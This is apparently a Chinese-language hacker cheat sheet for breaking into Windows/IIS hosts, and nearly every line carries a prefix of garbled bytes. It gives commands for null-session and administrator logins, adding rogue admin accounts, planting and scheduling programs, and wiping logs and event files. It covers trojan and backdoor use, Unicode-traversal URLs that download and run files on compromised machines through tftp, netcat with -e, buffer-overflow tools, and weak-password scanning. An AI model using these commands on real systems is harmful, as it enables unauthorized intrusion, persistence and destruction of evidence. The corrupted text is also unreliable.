网管和黑客都必须知道的命令
+>Gw�)�|oX 常用的几条NET命令:
Z7��[�S698 5M��Zv!N�� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�pF8:?p['z dL�w�P7#�r (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
7�!FiPH~kM ggYi�7Wzsd (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
��w�}t�}Sh R!W�DQGR(2 (查看远程主机时间) net time \\IP地址
,�# .12Q! BM)a,f�Igo (定时启动某个程序) at \\IP地址 02:18 readme.exe
}1+2&Ps50 z7)�$m0',? (查看共享) net view \\IP地址
/h`gQ�yGuY ab]Q1k��D� (查看netbios工作组列表) nbtstat -A IP地址
G2-0r.f��� e>�b��ARK< (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�>q�m�NT/ `,4@;�j<^@ (这两条把自己增加到管理员组): net user 用户名 密码 /add
eC L_c>3!
�'(�g;nU< net localgroup Administrators 用户名 /add
�}}k*i�0� 6\`8��b&'n (断开连接) net use \\IP地址\ipc$ /delete
�#z�Bqj;p� S\!vD�t�D@ 扫尾:
�}Z�<�Sca7 7PBE�(�d%m del C:\winnt\system32\logfiles\*.*
]T��g@wMgI ��q?�@*�� del C:\winnt\ssytem32\config\*.evt
�p�1���("� B]E�����c del C:\winnt\system32\dtclog\*.*
Wh~,?}laj� <K,X5ctM�} del C:\winnt\system32\*.log
#M5d,%?+#[ 5?([�jAOf del C:\winnt\system32\*.txt
uZ'Z-!=CL 5(E&jKn&�� del C:\winnt\*.txt
4�jZB�%tH� 4^ U%` ��1 del C:\winnt\*.log
#;?/f�ZjY ��[x��]~G� 一、netsvc.exe
Ih�4$MG6QC ���P"�]l/ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
!h�HX8TD^J jicH�94#(] netsvc /list \\IP地址
}[h]z7e2S� T<NOL�fk66 netsvc schedule \\IP地址 /query
99CK��� [G 5FF28�C)>/ netsvc \\IP地址 schedule /start
V�>GJ�O�(9 ?�mSZQF:d@ 二、OpenTelnet.exe
NJ�V�kn~< Q
w� - z�� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
$R+gA{49�% #
,�eC&X45 OpenTelnet \\IP地址 用户名 密码 1 7878
�" Up(�Vj@ �u3E �=�r� 然后就可以telnet到主机的7878端口,进入DOS方式下:
��<5P*u��Z ��5h0�Hk<N telnet IP地址 7878
�5X>~3�9(r \N�Ek B&^n 三、winshell.exe
)+�=Kh$VbS Z� @ef2y;� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
;[�[��6[i� #8lt�V`��� p Path (查看winshell主程序的路径信息)
jZ:/d�!�$S �1�1ky��rv b reBoot (重新启动机器)
"*�N#-=MJF �b{{ H@LTW d shutDown (关闭机器)
5�6.JB�BZZ �P�1�B=fgT s Shell (执行后你就会看到可爱的“C:\>”)
>VQ�LC&u�( s��vb7-.�! x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�u86PTp�+ �N�Gkx��g: CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
=&q��H%S�6 >5"e<mwD7d 四、3389登陆器,GUI方式登录远程主机的
E)f��9`�][ g��A�}<Y� 五、elsave.exe
4Vw�Ml)8ic S]~5iO_bst 事件日志清除工具
�j3T��)gFP
MI��^$�df elsave -s \\IP地址 -l "application" -C
��"P�O�8�Q AI#.+PrC{/ elsave -s \\IP地址 -l "system" -C
�H�$ g�*�� w�/rJj���* elsave -s \\IP地址 -l "security" -C
,d&3I�hYhD O>a1S*mxP� 执行后成功清除应用程序日志,系统日志,安全日志
j�m@M"b'�{ +`>E_+��Mp 六、hbulot.exe
A��'b$X1h o?t�� �H�[ 开启win2kserver和winxp的3389服务
�D %)L�"5C JtxVF���!v hbulot [/r]
kR�^h@@'F" �\[.���qN 使用/r表示安装完成后自动重起目标使设置生效。
#N�>66!/�V I"x�|�U[*B 七、nc.exe(netcat.exe)
W*CRxGyZCl VNIl�%9:-l 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
?wC�X:?�g� =�>tkc/aa� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
ztX$kX:_�m jg�G9?w)|u 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
GiE�t���;8 bHE.�E�BZ� 参数:
SJMbYjn�0J a`#lYM�%(> -e prog 程序重定向,一旦连接,就执行 [危险!!]
nGYi�m�RYO CM++:Y��vJ -g gateway source-routing hop point[s], up to 8
>dm��9�YfQ 1Q? RD%lkf -G num source-routing pointer: 4, 8, 12, ...
) ��5$�?�e 4
l-Ur�n�Z -h 帮助信息
K/f-9h�E F �*.k*JsU~B -i secs 延时的间隔
7�H{1i���� .udLMS/�_� -l 监听模式,用于入站连接
LPu��*Lkx �87+f�d_G -n 指定数字的IP地址,不能用hostname
�y2�s(]#�8 �43M.�Hj] -o file 记录16进制的传输
���JJ_��Z{ Q�kD����
~ -p port 本地端口号
�]Y�Fjz/�f wS�#��Uw_[ -r 任意指定本地及远程端口
�{4�Kvr4)4 /NCN wA�j7 -s addr 本地源地址
L�DHu10l�� �7]T(=gg / -u UDP模式
fd>{��UyU� �la-:"gK�C -v 详细输出——用两个-v可得到更详细的内容
~/��/E'V-� sRT H�_�]c -w secs timeout的时间
�L@6]~[JvP i�.)n#@�M2 -z 将输入输出关掉——用于扫描时
X��5
�or5v 八、TFTPD32.EXE
#\m.3!Hc�r ;)C�N=J�! 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
\� V�oly HB5-B �XBU http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
.qZz��'Eq[ ^�`";Gn�H0 然后可以直接令文件运行:
zs
I?��X>4 l~�]] RgU� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�$U�y+]9�
a<r���,L�E 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
a_5s'�D��h "%^_.Db>|� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
$G�"\@Y�C< ]�zJO)(d$> 一、一 Xscan命令行运行参数说明:
8��YlZ(�{f @�U�5�gxK* 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
<zn)��f�@W !fn%�Q'�S� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�7�A(4`D J �zq���NzWX xscan -file <主机列表文件名> <检测项目> [其他选项]
�@#,/6�s7? 6�X �h7Bx1 其中<检测项目> 含义如下:
#�n|5ng|CJ 6&SNF�OX{@ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
4u�oZw�3O TA*}p=?6?! -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
;u'VR}4p�h �z[_Y��,I� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
2a�k]&ll+h +CBN�[/Z^i -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�mp$IhJ6#� �z��i6J|u� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�P�A,aYg0f "�*X\'LPs= [其他选项] 含义如下:
}W�C[�<AqI �qF b�j~ec -v: 显示详细扫描进度
:3��Q:�pKg �`�
wEX; -p: 跳过Ping不通的主机
o��;�Z"I�& 1K�@�ieVc� -o: 跳过没有检测到开放端口的主机
\o�s"�w " �lF���/
Xs -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
